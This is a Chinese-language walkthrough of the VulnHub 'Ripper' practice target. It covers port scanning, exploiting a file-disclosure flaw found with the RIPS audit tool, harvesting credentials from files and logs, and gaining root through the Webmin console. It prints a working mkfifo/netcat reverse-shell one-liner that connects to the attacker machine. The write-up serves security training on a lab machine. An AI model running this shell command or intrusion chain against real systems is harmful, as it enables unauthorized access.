靶场搭建

靶场下载地址：https://download.vulnhub.com/ripper/Ripper.ova

下载下来是虚拟机.ovf压缩文件，这个靶机是VirtualBox的，直接用VM打开会报错想要用VM打开可以看我这篇文章：https://www.freebuf.com/sectool/343724.html

打开后把网络模式设置为NAT模式（桥接模式也可以,和kali攻击机保持一致就可以）

开启虚拟机

靶场搭建完毕

渗透测试

由于不知道靶机ip，所以需要扫描NAT的网段

147为kali攻击机的ip，所以148为靶机ip

扫描靶机端口服务开放情况

开放了22端口，存在SSH服务

开放了80端口存在http服务，且中间件为Apache2.4.29

开放了10000端口，存在http服务，且中间件为MiniServ1.910(Webmin)

先访问一下80端口的WEB

为Apache初始页面

搜索一下敏感目录，使用了不同工具不同字典，但是没有发现其它敏感目录

所以我们先去看一下10000端口的WEB

让我们访问https://bogon:10000。，所以我们需要把这个域名添加到hosts文件中

访问发现是Webmin的后台登录页面

先尝试一下是否存在admin/admin/admin123这样的弱口令，发现不存在

搜索一下敏感目录

发现存在robots.txt，里面有一段base64编码

解码

提示说他们用rips扫描php代码

通过搜索知道它是一个PHP源代码审计工具RIPS

并且使用rips，可能会存在rips路径

尝试访问，发现没有

猜测可能是在80端口上，尝试访问，发现果然再80端口上

这是一个代码审计，找是否存在漏洞的自动化工具，所以我们再WEB的根目录（/var/www）扫描，并且勾选扫描子目录选项，进行扫描

扫描成功，查看结果

查找看是否存在可以利用的漏洞，发现存在文件泄露并且存在file参数

尝试利用，发现可以读网站根路径下的文件，但是不能读取web路径以外的路径

发现这个漏洞只能用于读取文件，不会进行解析

所以我们只能尝试去读取一些敏感信息

这个代码审计工具有搜索的功能，尝试看能不能搜索到关于账号密码的信息

搜索发现了一组用户名和密码

ssh服务是开启的，尝试登录，发现登录成功

获得到第一个flag

还发现一个可疑文件，但是为空，好像是让我们sudo提权为admin

但是发现没有sudo命令

在/home目录下发现还存在一个叫做cubes的用户，我们可能需要先提权到这个用户

使用其它方式提权

需要提权到cubes用户，所以我们现在找cubes权限的文件，并且可以被ripper读的文件

通过命令

find / -user cubes -type f -exec ls -al {} \; 2>/dev/null查看cubes用户权限的文件

发现secret.file文件，查看文件

发现一段密码，猜测是cubes用户的密码，尝试登录，登录成功

尝试再次提权到root，sudo提权、suid提权、内核提权都不行

在尝试通过同样的方法在找找有什么其它特殊文件

发现有很多没用的目录和文件，经过过滤得到结果

find / -user cubes -type f -exec  ls -al {}  \; 2>/dev/null |  grep -v '.png' | grep -v '/proc' | grep -v '/sys'

发现一个miniser.log日志文件

在其中发现一对账号密码

猜测是登录webmin后台的，因为在webmin目录下

尝试登陆，登录成功

在左下角发现可以直接执行命令

发现权限为root

利用这个命令执行再反弹一个shell

先监听端口，然后执行命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.52.147 4444 >/tmp/f

获得第二个flag

此版本的webmin也存在rce漏洞，但是也需要账号密码，登陆后也可以通过漏洞来获得shell。